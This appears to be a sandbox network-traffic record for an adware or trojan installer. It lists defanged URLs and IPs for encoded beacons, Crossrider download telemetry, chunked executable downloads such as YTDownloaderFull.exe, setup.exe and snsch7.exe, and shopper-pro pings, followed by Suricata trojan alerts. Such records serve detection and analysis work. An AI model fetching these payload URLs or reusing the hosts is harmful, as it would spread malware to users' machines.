hxxp://yk9s88xsxo-zxis6jz8.netdna-ssl.com/27136.ashx?e=1ZEnpGuz/ISSsSz5Gin3Vt5jOExRmJjc8f9/KvgcVLM2fVsQFDtppKaDl0KcD5tVUA7dl9owwhIeI9VTThLJ3RT4XQvpdvP/vmvWGv/OqVKUNzDX0G1Ln0DOGtgSBCtpWMnNHFDGURlx2SsMiXJFnYjCD6AQoJRopynfaNYH8L/fV9OCtHXZfA3mXJEY39mHAhwsRGINrujU8aLWOIyJUH8YWruN4e6MEbymkiujpsVTxWhzXOleYJkIdnqYjudekgj0wc9eDMUnCmQO3a9dMJOXaRLeTy 6CAOOMT3NqqJO9TngHSIOj44034t1Q4pu3fndBZnH/Wk11N66AH6x9ECOCGFuwZcChv/PiC3eG4oUVviRAos4otKOgpxEcX4mOWTBRoXJJz/rKwD6t b1ZR4j1VNOEsndFPhdC l28/ a9Ya/86pUpQ3MNfQbUufSXu086SR5S8= 198.232.124.192
hxxp://yk9s88xsxo-zxis6jz8.netdna-ssl.com/15359.ashx?e=ZfTZC8DxP8YF7tXbo2OpjW4qNgpZFK9FKB2ZKuKuT4UgLxC0aXqYrUEev CIr75kJRiOVUDkXyNETAlhmitFcoBTqgRg0M9kCy5U1DKQBR/1HrjuYPfZlNCUHeR8YCF38sTNuKvNOs5qISpLPhmveuzfeVbSlzknygSzf6SEdqUj0Olzxy0WCFP u/7dSCX0U7zGYxFVZk5vuPkkDKInkPC8afBy6IKMEefda087tOQ= 198.232.124.192
hxxp://yk9s88xsxo-zxis6jz8.netdna-ssl.com/10266.ashx?e=ZfTZC8DxP8YF7tXbo2OpjW4qNgpZFK9FKB2ZKuKuT4UgLxC0aXqYrUEev CIr75kJRiOVUDkXyMp9bfbo1 pjYBTqgRg0M9kCy5U1DKQBR/1HrjuYPfZlNCUHeR8YCF38sTNuKvNOs5qISpLPhmveuzfeVbSlzknygSzf6SEdqUj0Olzxy0WCFP u/7dSCX0U7zGYxFVZk5vuPkkDKInkPC8afBy6IKMEefda087tOQ= 198.232.124.192
hxxp://yk9s88xsxo-zxis6jz8.netdna-ssl.com/YTDownloaderFull.exe 198.232.124.192
hxxp://yk9s88xsxo-zxis6jz8.netdna-ssl.com/27136.ashx?e=c2mW1WEUbCET/daslwwbUogIgfgifRkfaMzgTHP7UuyprdrU7aLZjhtIkRVrgKLwRdb/S8YKHkPcr4ZRnoqTVUOgPoSQeroSQMPOYURUu2BNfh4qpckIN6kO9/DuORuprIIa1xct7ImOrIk6OakHpXG9WQc5JBBFclHT2qvGHts3SQCeXx1TCLUISLCJlFqul4CnWC C4vHu2csK9H8/A3AVeGnpHjBs0JQd5HxgIXcvF5YR0KhEBdvPLr6VHnfYX6ABQ4xl C6XAmRABUbmSYRA5W RLpwIoLj8WN7CI8VJWpTUhdoetbAQhJgQ701LudQlG124a8hFOTAwlw8YF3uTBXM1Y6t 6KtOGc7JYKogsm34mrKW2Q== 198.232.124.192
hxxp://yk9s88xsxo-zxis6jz8.netdna-ssl.com/27136.ashx?e=ZfTZC8DxP8YF7tXbo2OpjW4qNgpZFK9FKB2ZKuKuT4Xezmr5wsXHLCEdbCsTxXU3qJDnlUORNKJFgAYD7IlOObhfXDxmrTSK7QblguX5JvoeC1e2SDVtV0Et4u7lqt3sALWQVKcMZfCF1xI06rglXZ6Eeh5vZKO2eqfOL09Waq7Jn1GegIILyOsrHZsRsIfMRhg0WUsz0Xly/L51iHZ9r5N1eAbd3t0uTl0SfHFTsacMteo8rnbW10COCGFuwZcChv/PiC3eG4oUVviRAos4otKOgpxEcX4mOWTBRoXJJz/rKwD6t b1ZR4j1VNOEsndFPhdC l28/ a9Ya/86pUpQ3MNfQbUufSXu086SR5S8= 198.232.124.192
hxxp://yk9s88xsxo-zxis6jz8.netdna-ssl.com/9313.ashx?e=KSz5qzb2KgILjT49fHfOTEy1U5i0Jcc8jvdcLv9L0ULeyzV7AofXlljJzRxQxlEZcdkrDIlyRZ3 QFrihM290CN9h bV19VdXQO8eCkzNk9LWPkwGrB/imF904v4t2DTTuHrYVulo109x0h yMmOp6IOl1JW3sHB9kWS7dXZ6elIsRF9MX88CO265/Kjb 488/XPfhk4uBUiNRLLAgct5oMOyZur3pkEghD3HnQv1a/gCZD66/sdSVKFBzVQWjB05oujAfFWpTOgMsHybNe40DPXjVNm at3mAerssgcNWUIia6WITopWDcT qioK0TvO7tQdS7Pb5LlxRWf0cqGrN/G5zN QDpcSQHkYgFaOBv7DByqGp2noDEWmBK24T6wUFUm6AwzmaIYfI6O6ruLd0T1shsZ 3kYZJCvGTB0II76PaOLcDiT6i7uu4ZLp9tYOQ0C4B6wOMHFWmaAPLjzUoonoBGYhxQckdTtpt CJE/NAFMRO0hJ42ac9bD3MadSN58qZygCScEpVXMQzDInewhsAaqZyLDLLNMXZjRZW4= 198.232.124.192
hxxp://yk9s88xsxo-zxis6jz8.netdna-ssl.com/11153.ashx?e=NVqRyNkruooT/daslwwbUvMtz3dZh2P6aMzgTHP7UuxxTYwWxYG9WM2wWArmgLQLxpJZRDiatLKZwV0mx4LJvkCN9h bV19VdXQO8eCkzNk9LWPkwGrB/imF904v4t2DTTuHrYVulo109x0h yMmOp6IOl1JW3sHB9kWS7dXZ6elIsRF9MX88CO265/Kjb 488/XPfhk4uBUiNRLLAgct8wjjUrZ/qJkmB0RNQ 9BzBNqeRPeOqgjazACGY CgK6eqXaZH4mK3kqgSNqV7u8iR3AQSpIJXB7L4uKB8G6McV84RHzLnn1bXMAwyoiKXvjmRmxRGf9zFEKY/VNO/cxtzOS6jq UbgqBz1jcZZbz05IQbYQvC6sk0cdVK5OLpFHVdPwqUuqOwA003r2uKrGnlnotumY2YUYLnl7FCVUbw972nxHK4nudtK7r9jGEfZIEoRN 6ZHvZxCVNbsRxhip/uvaFUgbktt1b8Epic0SPi6TzbxlgO9RcTQfYT78rW6o JhFVUwrL/KKMB ON7 S1TM8xmV4vn5emS9jXjFgnw= 198.232.124.192
hxxp://yk9s88xsxo-zxis6jz8.netdna-ssl.com/27136.ashx?e=QHucCbLl /YLjT49fHfOTKA34GYfZJUsjvdcLv9L0UIbIGZvOdVpu1XTUggPGJK SlCyq068/M1FOTAwlw8YF3uTBXM1Y6t 6KtOGc7JYKogsm34mrKW2XwF8xC533FcDPI5dGTWg7/iOZEO6FSB/sV8mKKVLIm1QG1CxyaZxv/Uh 3ZGDmdW5pZis9f nTddyS4BuUDC9WTdXgG3d7dLk5dEnxxU7GnDLXqPK521tdAjghhbsGXAob/z4gt3huKFFb4kQKLOKLSjoKcRHF JjlkwUaFySc/6ysA rfm9WUeI9VTThLJ3RT4XQvpdvP/vmvWGv/OqVKUNzDX0G1Ln0l7tPOkkeUv 198.232.124.192
hxxp://yk9s88xsxo-zxis6jz8.netdna-ssl.com/9313.ashx?e=wlkQ3WKgYpSXQ02 mivEAEQ1GWwIMthwtyLw6hNuJQGAMRxV Cn6lnsc7hbJtTJHDHGXB7YFOPH7H OCiIJdXc LjjRvaSA4fJsKHIM1ro1Fhap1svS6Dz9hP8ILQ7STKYX3Ti/i3YOeiDpdSVt7BwfZFku3V2enpSLERfTF/PAjtuufyo2/uPPP1z34ZOLgVIjUSywIHLeaDDsmbq96ZMtJ XAicqhKxNB9hPvytbqj4mEVVTCsv8oowH443v5LVMzzGZXi fl6ZL2NeMWCfA== 198.232.124.192
hxxp://yk9s88xsxo-zxis6jz8.netdna-ssl.com/11153.ashx?e=4mC0vXGWFtoJz2TpdH2qbEQ1GWwIMthw7wq1eibGVAGAMRxV Cn6lnsc7hbJtTJHDHGXB7YFOPH7H OCiIJdXWPgIqkg/KntpjkZwwc6dH53FRTfUsruhOl6T0Yw8cmQjgb6v7cXpPu93RkgrfPIdK/1bjUefs49JU1ySiay1sqdymVuPyjsZ40oQa07NiSGd51jxu8kbC0X1dGgWnCEBcBeHgs9Q765QI4IYW7BlwKG/8 ILd4bihRW JECizii0o6CnERxfiaF8KpepynoFA== 198.232.124.192
hxxp://errors.crossrider.com/utility.gif?error=start&report=mini_s&ver=1729&action=na&ms_vr=3&clock=15&rnd=18514 208.85.150.249
hxxp://errors.crossrider.com/utility.gif?error=start&report=mini_s&ver=803&action=na&ms_vr=3&clock=0&rnd=18514 208.85.150.249
hxxp://errors.crossrider.com/utility.gif?report=fdata&f=3&c=803&i=10&n=ms_started&rnd=19871 208.85.150.249
hxxp://errors.crossrider.com/utility.gif?report=fdata&f=3&c=1729&i=10&n=ms_started&rnd=19871 208.85.150.249
hxxp://errors.crossrider.com/utility.gif?report=fdata&f=3&c=803&i=20&n=ms_start_download&rnd=16011 208.85.150.249
hxxp://errors.crossrider.com/utility.gif?report=fdata&f=3&c=1729&i=20&n=ms_start_download&rnd=16011 208.85.150.249
hxxp://cds.c5z6s5a3.hwcdn.net/web/gf/all/setup.exe_c
hxxp://cds.c5z6s5a3.hwcdn.net/web/gf/all/setup.exe_d
hxxp://cds.c5z6s5a3.hwcdn.net/web/gf/all/setup.exe_e
hxxp://cds.c5z6s5a3.hwcdn.net/web/gf/all/setup.exe_b
hxxp://cds.c5z6s5a3.hwcdn.net/spdbt/shoppy/snsch7.exe_e
hxxp://cds.c5z6s5a3.hwcdn.net/web/gf/all/setup.exe_a
hxxp://cds.c5z6s5a3.hwcdn.net/spdbt/shoppy/snsch7.exe_d
hxxp://cds.c5z6s5a3.hwcdn.net/spdbt/shoppy/snsch7.exe_b
hxxp://cds.c5z6s5a3.hwcdn.net/spdbt/shoppy/snsch7.exe_c
hxxp://cds.c5z6s5a3.hwcdn.net/spdbt/shoppy/snsch7.exe_a
hxxp://errors.crossrider.com/utility.gif?report=fdata&f=3&c=803&i=30&n=ms_download_success&rnd=25343 208.85.150.249
hxxp://errors.crossrider.com/utility.gif?report=fdata&f=3&c=1729&i=30&n=ms_download_success&rnd=25343 208.85.150.249
hxxp://errors.crossrider.com/utility.gif?report=fdata&f=3&c=803&i=35&n=ms_about_to_exc&rnd=25324 208.85.150.249
hxxp://rep.shopper-pro.com/app/ping.ashx?e=KC52kqqAunAF7tXbo2OpjYavQM3IkVbX2YTeaOaZJPFysSIQM/WMqhsgZm851Wm705cEc0dFwLhTxWhzXOleYCZCp63jGZtjv06NRyXKgtkdRS7ocO43fkEXlTeNLX sfKwlC2TeCg7lnoGCEF1IIyQxWeZ2hMdUZrdGZ5CXclVTvMZjEVVmTm 4 SQMoieQ8Lxp8HLogowR591rTzu05PNsA1iuxLaBHdtdgGHkZrI4k4Gm5vvSsk7q1DqDoShwFmblcMjHXRdicB7EPPnRdOUS4717SFgKd6j7/wRBDsRoqvWX6JwkejqMehRdfaX6iZYn8TH3Pe3MlW9RFqOniqVRDsrPlqwdmkLLb35jLfrVLutmednZNQ== 54.197.238.106
hxxp://rep.shopper-pro.com/app/ping.ashx?e=j7YMo/n29XPJd3Cl8WpRrt5jOExRmJjcO2zR9ArYI84icvsFwQStENB87jgWTbK/3s5q cLFxyxYWD4MTU1ewbPSKLqmmOmOblFuMGpJvGKIJGNp/ 1I9GCArG4HtKvdX1gPBPGd4Gf2NRySioDRRk/1J3P8veFvLH4IoLPLWWwmPRXV7cLSOcTQfYT78rW6o JhFVUwrL/KKMB ON7 S1TM8xmV4vn5JDr9I5ZW0pTpBU9U/r/dsNyvhlGeipNVQ6A hJB6uhJAw85hRFS7YMmYLvqrm5 34uZ/p4emFS3nW9YwSk5gj28Va7JmIs/Bl13yhrpfYAMeIGfrzyWRyvy2gKbXyPPDXUoXAX2Uiz3W6sPFKrniC4jaKTJ4Po/ 54.197.238.106
hxxp://errors.crossrider.com/utility.gif?report=fdata&f=3&c=1729&i=35&n=ms_about_to_exc&rnd=25324 208.85.150.249
hxxp://rep.shopper-pro.com/app/ping.ashx?e=Ka qOJkckoXHjWHokC5IQKgWR 5S3q5q62ls PLHCLDT03ZwnpMmrnnHkVEbFY2mhwr4VlWkO0yul9pd4H5jC6/NyPZdyyiin/GGy8byFgpgKkdlz1lRoYK03JXbbVmAY0ZRB54QLU9s0DpOFQBDKtJMHu88K1rwaE3O18WF9F0d212AYeRmsjiTgabm 9KyTurUOoOhKHAWZuVwyMddF6Z1N9JE36WiiCgXFJE54ba3yZbyqF02 D1Q ijBQ9I1GFvOpVsOwzzvGXsyNILdq6t9GbH/wnaf3AtLPqBYAg4fnTdJhi/F jqL/OPRls1am988pbBE198Bbak1i16fYytqnU4k0fribeIhZIOGE9621TzruYcSjl gAUOMZfgulwJkQAVG5kmEQOVvkS6cCKC4/FjewiPFDMWtlnh6ykf3xLsYR5HcB6c2C4KGeMVjZ4jzc3YjAmYShy1QgM mULHn4xNjI6qV1hbcceYGEhwEchBIBSL pnq6LeO//ew/cRstaZMh7oc9Jm6LOUplLi9UaJ0lDNBvBxfXneO6iyXLvPTXiM8YeL1JXfzjhvHW 54.197.238.106
hxxp://rep.shopper-pro.com/app/ping.ashx?e=2UW/O98m6H8F7tXbo2OpjW0n2MBpLjeO2YTeaOaZJPFysSIQM/WMqhsgZm851Wm705cEc0dFwLhTxWhzXOleYCZCp63jGZtjv06NRyXKgtnU2Z1SyzBY81o8H6qezB8RqTFlxlzn4VKX1U8GGWeNj61SjtAHPTC3QI4IYW7BlwKG/8 ILd4bihRW JECizii0o6CnERxfiYoYL3r 4idOA8Kj6Mu8v3vRYAGA yJTjm4X1w8Zq00iu0G5YLl Sb6QG6vuKMEZ8b/AUix4dIkZvQPHab7QXjtoXNw24za1vD4WpTRkXhg7nV3/LPfa2aq5oeRu5C4CqkWleu6Ut5wZJLhm4jKngLIPSVmnMg23wA= 54.197.238.106
hxxp://errors.crossrider.com/utility.gif?error=mem_strt&report=mini_s&ver=803&action=na&ms_vr=3&clock=15000&rnd=20529 208.85.150.249
hxxp://rep.shopper-pro.com/app/ping.ashx?e=WL9usJOVMsPXmto/P2xI1pGfa3o7qc5t56XqnYmheUgSZTerw9Y85dVUaX7QH4byIYSfA6BN7OBJ4GPHeEFvMkF5ezSia8QQf4SJJgI1sB24ZvM W8i8tdtgpjL3X7N9nl1xOKDZuhXrGiiXWYz3NvgrB1VZh8CMsYns0spGP2dTvMZjEVVmTm 4 SQMoieQ8Lxp8HLogowR591rTzu05PNsA1iuxLaBHdtdgGHkZrI4k4Gm5vvSsk7q1DqDoShwFmblcMjHXRdicB7EPPnRdH5TN3b4ooc0d6j7/wRBDsRoqvWX6JwkejqMehRdfaX6iZYn8TH3Pe3MlW9RFqOniqVRDsrPlqwdmkLLb35jLfrVLutmednZNQ== 54.197.238.106
hxxp://errors.crossrider.com/utility.gif?error=mem_strt&report=mini_s&ver=1729&action=na&ms_vr=3&clock=15890&rnd=20529 208.85.150.249
hxxp://rep.shopper-pro.com/app/ping.ashx?e=WL9usJOVMsOEyHZoFFyrCAXu1dujY6mNj6To0cJP4sHZhN5o5pkk8XKxIhAz9YyqGyBmbznVabvTlwRzR0XAuFPFaHNc6V5gJkKnreMZm2O/To1HJcqC2WadpT4UtSGCs4164GCUCrHofaoyXCfoQHfnxDGMvPkm88zk3vjcmKS6F3bO0r3toDYVc3vn XSLjZpz1sPcxp1I3nypnKAJJwSlVcxDMMid7CGwBqpnIsNd jErBGkiDqZpQuUsyuErvSm4upuKAkZExocXcgC5365nTl0wIYvEx07U7eKz/qJg4GZE0lzROYY2d48H/jH53sGqR1dd1 CYgbDq2EyqHZXiNwermIPJaqcLsqnN14kxDoAIuanBxUzm JXfFf4aShZXLko8QlU= 54.197.238.106
hxxp://rep.shopper-pro.com/app/ping.ashx?e=WL9usJOVMsOEyHZoFFyrCAXu1dujY6mNj6To0cJP4sHZhN5o5pkk8XKxIhAz9YyqGyBmbznVabvTlwRzR0XAuFPFaHNc6V5gJkKnreMZm2O/To1HJcqC2VX2gru9mb3lVEZbv3odR7drnS7dfKKClSmRgGcjsyyBKl4uaJsEWT1rk4Satsm2USSWkiD 8aIWFAbDvDttaaPPt30posPzj93QiescafgJJI2sziJUfUjYt3Zg/aKemGVSvOHNjNGnWk7S5mNvBaWXs3H/bXdU0ToldukDzx1llVhPQP8X9sNG9pOkZ/PfGFwkoLVF6jef2zYWz6DzTPSToKv2VpIXZetFtmcGfLS6G/eITPVk2cBiFIt/eCwnOFhZWN4UpKuAnAhg 6mBvfU= 54.197.238.106
hxxp://rep.shopper-pro.com/app/ping.ashx?e=WL9usJOVMsOEyHZoFFyrCAXu1dujY6mNj6To0cJP4sHZhN5o5pkk8XKxIhAz9YyqGyBmbznVabvTlwRzR0XAuFPFaHNc6V5gJkKnreMZm2O/To1HJcqC2TQDvlMwbi/4Fsp1Rvh9JTeKcWyRatcCZS5MYXZwv0Sa2 GUfuos17apw1GQ93goy8ou0ipnPyAc/1td01976VC51CUbXbhryEU5MDCXDxgXe5MFczVjq37oq04ZzslgqiCybfiaspbZo2Pjw4zIP8Koiz5XsOzoJG5lkiLn 2iON4UrLMQQDZPMFopdoQp3MXCrArhn8sH AS7DCm3ZJZeNpBJRUpe7bX0UJxZodl69 54.197.238.106
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=000803&i=100&n=init_start_funnel_step_name&rnd=1439464835
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=001729&i=100&n=init_start_funnel_step_name&rnd=1439464836
hxxp://dl.maxdevzone.com/web/gf/all/setup.exe_e 69.16.175.42
hxxp://4g3dwvcs2-zxis6jz8.netdna-ssl.com/27136.ashx?e=xY8ohDYpM iI4k8LaFSbf2rex8R/qraqnvZi s3jtzHHU/jEYNR1P0lsAQkxXUtnghmiZJc6KBe9Kbi6m4oCRkTGhxdyALnfrmdOXTAhi8THTtTt4rP ovDfknCUwfuRDHGXB7YFOPH7H OCiIJdXed4zY8kJssz333RAvM0VMDqVqSY7buIRtCUHeR8YCF3BQ8MIYMfS0tAjghhbsGXAob/z4gt3huKFFb4kQKLOKLSjoKcRHF JjlkwUaFySc/6ysA rfm9WUeI9VTThLJ3RT4XQvpdvP/vmvWGv/OqVKUNzDX0G1Ln0l7tPOkkeUv 198.232.124.192
hxxp://dl.maxdevzone.com/web/gf/all/setup.exe_a 69.16.175.42
hxxp://4g3dwvcs2-zxis6jz8.netdna-ssl.com/27136.ashx?e=xY8ohDYpM iI4k8LaFSbf2rex8R/qraqnvZi s3jtzHHU/jEYNR1P0lsAQkxXUtnghmiZJc6KBe9Kbi6m4oCRkTGhxdyALnfrmdOXTAhi8THTtTt4rP ovDfknCUwfuRDHGXB7YFOPH7H OCiIJdXed4zY8kJssz333RAvM0VMBHkkQ8dewzaRQC drCF7eFysWDrahxHN3E0H2E /K1uqPiYRVVMKy/yijAfjje/ktUzPMZleL5 Wu7K8cv9dNF9NtefOTH4Uod212AYeRmsjiTgabm 9KyTurUOoOhKHAWZuVwyMddF8BgyCi5mlJL 198.232.124.192
hxxp://4g3dwvcs2-zxis6jz8.netdna-ssl.com/27136.ashx?e=obiBp3WOda9tb/LgACKPGkQ1GWwIMthw2qShU7Jjo1uAMRxV Cn6logu1Rce7K8yfl0yK7ww8bQbTivYZlBvEDiTgabm 9KyTurUOoOhKHAWZuVwyMddF4DvgIgyQhW4FOOgkw2kW7zvB/zEWicRw8Nh KJlr0oRAKcFpVLy3NZgKkdlz1lRofr/zw3mMKgg0JQd5HxgIXcyW34jq/xhC69GO739HYqB8SJA d bWCFeYyujkXy401 gAUOMZfgulwJkQAVG5kmEQOVvkS6cCKC4/FjewiPFSVqU1IXaHrWwEISYEO9NS7nUJRtduGvIRTkwMJcPGBd7kwVzNWOrfuirThnOyWCqILJt Jqyltk= 198.232.124.192
hxxp://dl.maxdevzone.com/spdbt/shoppy/snsch7.exe_b 69.16.175.42
hxxp://g2rg9r-1ghhyl1c.netdna-ssl.com/YTDownloaderFull.exe 198.232.124.192
hxxp://4g3dwvcs2-zxis6jz8.netdna-ssl.com/27136.ashx?e=043Mckb8Lnhw7iCtSAyu/0Q1GWwIMthwOB8LVXt4qhaAMRxV Cn6logu1Rce7K8yfl0yK7ww8bQbTivYZlBvEDiTgabm 9KyTurUOoOhKHAWZuVwyMddF4DvgIgyQhW4FOOgkw2kW7zvB/zEWicRw8Nh KJlr0oRpMGDKQa0FePEEASnTAt8o vdWl3XnoKt0JQd5HxgIXd4Ck/GAouPo3pu1a2/pSyUlKYWIS4b/TwQz5kcPJsPBXgEPYkm2R 4CM84BubBye2orW/U9pNYEne5haHOFLYKd5SlKONgbzwnZSRpvuXhKkCOCGFuwZcChv/PiC3eG4oUVviRAos4otKOgpxEcX4mOWTBRoXJJz/rKwD6t b1ZR4j1VNOEsndFPhdC l28/ a9Ya/86pUpQ3MNfQbUufSXu086SR5S8= 198.232.124.192
hxxp://4g3dwvcs2-zxis6jz8.netdna-ssl.com/10266.ashx?e=NdvkYMTo1KsT/daslwwbUrln8Tc7JdzDaMzgTHP7UuxxTYwWxYG9WM2wWArmgLQLxpJZRDiatLLr8onAm2k8 UCN9h bV19VdXQO8eCkzNk9LWPkwGrB/imF904v4t2DTTuHrYVulo109x0h yMmOuOY6cLwcbD07lG1xkeY5jbRwdqu9soHjYgwamV62X9gO95zWp5ecIePiKgomzd5XT9xoSCfVrLCPk3SNaw1Hwyh7Gcj1ILXhdtXANK2UVVldUmBhCw8CHnrErQ9Bnn0aGNDEgQGSeDWcuFD/oqMC4ywj137NFRjrrStcIq/vZyTdriV4mPeB3fQbFCQv5BK9FdmE/yeJSe6i5CWtbGsRuHfTuvFpnVrlF9LGvMrDlXCLGhXnLEz5pbP YAvZ/SRS XEWbcA1chWcCJK1OHTiKZmXIkKgXd7TGpnBktR0W195FKDVXPs8UDrf7gVRTtqGyUpmLFbLFiWF8xS3bBaukC3g671NSdAWbPZE8t0P6yGa vpLH0m0oO jwDV6udpLox4w9PSLDKW3MoS/fu50NKaR9WivOCmrDK2XoJ06HUM62z6JB0wq6Xw1VxvH51bFJF4kQIHXTAmjFaC1iN6TTHRdsGMkr9o5Q== 198.232.124.192
hxxp://4g3dwvcs2-zxis6jz8.netdna-ssl.com/27136.ashx?e=N6dOqWm8Q95rOakOyNRzsN5jOExRmJjcpL1q0D3vvXQ2fVsQFDtppKaDl0KcD5tVUA7dl9owwhIeI9VTThLJ3RT4XQvpdvP/vmvWGv/OqVKUNzDX0G1Ln0DOGtgSBCtpWMnNHFDGURlx2SsMiXJFnYjCD6AQoJRo0ATae6NSkcvIROPie2z40 X0A62pnUj3KYX3Ti/i3YOBks urBi 1VbQfHq0QVBDarxXN1e/eRVfoAFDjGX4LpcCZEAFRuZJhEDlb5EunAiguPxY3sIjxUlalNSF2h61sBCEmBDvTUu51CUbXbhryEU5MDCXDxgXe5MFczVjq37oq04ZzslgqiCybfiaspbZ 198.232.124.192
hxxp://4g3dwvcs2-zxis6jz8.netdna-ssl.com/27136.ashx?e=j7YMo/n29XMVCZIctrluXs30ehTmVX1mzeUpkoQZA95XGmhmyGgv7nVMtS3FkLVnp2RYIisGWDtlUrzhzYzRp1pO0uZjbwWll7Nx/213VNE6JXbpA88dZXJ6A7OzALu5zbBYCuaAtAvGkllEOJq0sp3jz2it1PuY hmSQlakOO/yw2dOqRz0VTJIBlhaXll/jgb6v7cXpPsHbyM38hHiddP9Uf4p/RQ UMx9TNBbmkTjcSbV/8/K3y93eDbW4 bAU7zGYxFVZk5vuPkkDKInkPC8afBy6IKMEefda087tOQ TnksFA3b2toTYm7KkeYVZVK84c2M0adaTtLmY28FpZezcf9td1TROiV26QPPHWU1VVI0/LSiBw== 198.232.124.192
hxxp://dl.ourinputinfonet.com/spdbt/shoppy/snsch7.exe 69.16.175.10
hxxp://dl.maxdevzone.com/web/gf/all/setup.exe_c 69.16.175.42
hxxp://4g3dwvcs2-zxis6jz8.netdna-ssl.com/27136.ashx?e=oE Olq3N8DJENRlsCDLYcDgfC1V7eKoWgDEcVfgp paILtUXHuyvMn5dMiu8MPG0G04r2GZQbxA4k4Gm5vvSsk7q1DqDoShwFmblcMjHXReA74CIMkIVuBTjoJMNpFu87wf8xFonEcPDYfiiZa9KEaTBgykGtBXjGxrTqW15vZAooxpS5ufgquJVjHmrT0TCdGBVM3gUbVwDpXxHWgmjuq9qGTCPFxGMacNTVL60tsKrgHWJBZg2eTkxN6pxw89Ap19bfV/XketHQPSr00xn/pt5BjWOuab4BLZMo3KhL4A7oa41N9YhxikzL8hyzXRMc0g1gcxjite /Y3KN3CLINidK03d0MuzZPHJU0qA9vA9GanF1RNNmMzXUezINFlsIV5dJNE8xQtEL6kO6MAPPRk3pYsWha92dV1 PcKMtTouTGF2cL9EmtvhlH7qLNe2qcNRkPd4KMvKLtIqZz8gHAuCtKRlIVo2d3 uKF6e7H0PCo jLvL970WABgPsiU45uF9cPGatNIrtBuWC5fkm vE4nW28 Q65 198.232.124.192
hxxp://4g3dwvcs2-zxis6jz8.netdna-ssl.com/27136.ashx?e=1ZEnpGuz/ISSsSz5Gin3Vt5jOExRmJjc8f9/KvgcVLM2fVsQFDtppKaDl0KcD5tVUA7dl9owwhIeI9VTThLJ3RT4XQvpdvP/vmvWGv/OqVKUNzDX0G1Ln0DOGtgSBCtpWMnNHFDGURlx2SsMiXJFnYjCD6AQoJRopynfaNYH8L/fV9OCtHXZfA3mXJEY39mHAhwsRGINrujU8aLWOIyJUH8YWruN4e6MEbymkiujpsVTxWhzXOleYJkIdnqYjudekgj0wc9eDMUnCmQO3a9dMJOXaRLeTy 6CAOOMT3NqqJO9TngHSIOj44034t1Q4pu3fndBZnH/Wk11N66AH6x9ECOCGFuwZcChv/PiC3eG4oUVviRAos4otKOgpxEcX4mOWTBRoXJJz/rKwD6t b1ZR4j1VNOEsndFPhdC l28/ a9Ya/86pUpQ3MNfQbUufSXu086SR5S8= 198.232.124.192
hxxp://4g3dwvcs2-zxis6jz8.netdna-ssl.com/9313.ashx?e=wlkQ3WKgYpSXQ02 mivEAEQ1GWwIMthwtyLw6hNuJQGAMRxV Cn6lnsc7hbJtTJHDHGXB7YFOPH7H OCiIJdXc LjjRvaSA4fJsKHIM1ro1Fhap1svS6Dz9hP8ILQ7STKYX3Ti/i3YOeiDpdSVt7BwfZFku3V2enpSLERfTF/PAjtuufyo2/uPPP1z34ZOLgVIjUSywIHLeaDDsmbq96ZMtJ XAicqhKxNB9hPvytbqj4mEVVTCsv8oowH443v5LVMzzGZXi fl6ZL2NeMWCfA== 198.232.124.192
hxxp://4g3dwvcs2-zxis6jz8.netdna-ssl.com/27136.ashx?e=N6dOqWm8Q95rOakOyNRzsN5jOExRmJjcpL1q0D3vvXQ2fVsQFDtppKaDl0KcD5tVUA7dl9owwhIeI9VTThLJ3RT4XQvpdvP/vmvWGv/OqVKUNzDX0G1Ln0DOGtgSBCtpWMnNHFDGURlx2SsMiXJFnYjCD6AQoJRo0ATae6NSkcvIROPie2z40 X0A62pnUj3KYX3Ti/i3YMtu6Il6K42s07l01ouN0CW2hnxCMb9MQTrbPokHTCrpfDVXG8fnVsUkXiRAgddMCaMVoLWI3pNMYIaukc1i7BWldmt6Vgk8tSuaFT9xqmWN6c2C4KGeMVjZ4jzc3YjAmYShy1QgM mULHn4xNjI6qV2YCgKhxKgoU= 198.232.124.192
hxxp://4g3dwvcs2-zxis6jz8.netdna-ssl.com/27136.ashx?e=c2mW1WEUbCET/daslwwbUogIgfgifRkfaMzgTHP7UuyprdrU7aLZjhtIkRVrgKLwRdb/S8YKHkPcr4ZRnoqTVUOgPoSQeroSQMPOYURUu2BNfh4qpckIN6kO9/DuORuprIIa1xct7ImOrIk6OakHpXG9WQc5JBBFclHT2qvGHts3SQCeXx1TCLUISLCJlFqul4CnWC C4vHu2csK9H8/A3AVeGnpHjBs0JQd5HxgIXcvF5YR0KhEBdvPLr6VHnfYX6ABQ4xl C6XAmRABUbmSYRA5W RLpwIoLj8WN7CI8VJWpTUhdoetbAQhJgQ701LudQlG124a8hFOTAwlw8YF3uTBXM1Y6t 6KtOGc7JYKogsm34mrKW2Q== 198.232.124.192
hxxp://4g3dwvcs2-zxis6jz8.netdna-ssl.com/15359.ashx?e=eFCD8T/coiezrE/yDXLQyd5jOExRmJjcfsQaZZXSd Q2fVsQFDtppP2TEkHeJNDUDPI5dGTWg7 SOxGOFR1rQ7/gCVcfJT7Zd/XCztdoPbJFiFlIaXxqEcmxw368usKjvx7ENkzRxOw/caEgn1aywgBPaL3foawtkjneDvF7aJsyFrdg9Bz4vxjVxaO/jmdPBGRotN0ABYeEjtD/tYznR 0LhpxXD4t4eCmOKii sWrz7yH4dpDjMWLUJGnTsXhlEK5u6pECdO1SxiNrRjAGZBB5aSy JFSFglNuW4n71dQey68r 4NN8VyKsbjLeBp4dMm3hqMstJ/y06twORtLg9fHR9A6p3upOM0S4XWXQNckrM9d9qKvEEB2Ep7ddBI2V0TFaJ4cExkLJWSC3b0K eCko9DIyNsADn6EXOLggZKypkVJN3kXvFA4InH5qGL6TgskKX3SgwYohnxsdae b8EiI8s6T8qHsyKop7n4S NokPwegfs5DA6y2ObHsF4aVuJuMr 09WnXl3jXxrL4WWiPc6F0Foo3zqD0Un5LpMl6Vac8KKMKQ dvxgza/aJvlagtVicvngwklpIg/vGiFhQGw7w7bWmjz7d9KaLD84/d0InrHGn4CaR2deZjme0S 198.232.124.192


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET POLICY Executable served from Amazon S3
ET TROJAN Possible Win32/Gapz MSIE 9 on Windows NT 5
ET TROJAN VMProtect Packed Binary Inbound via HTTP - Likely Hostile
ET MALWARE Possible Windows executable sent when remote host claims to send a Text File
SURICATA STREAM ESTABLISHED packet out of window
SURICATA STREAM Packet with invalid ack
SURICATA STREAM ESTABLISHED invalid ack
SURICATA STREAM FIN out of window

Traffic

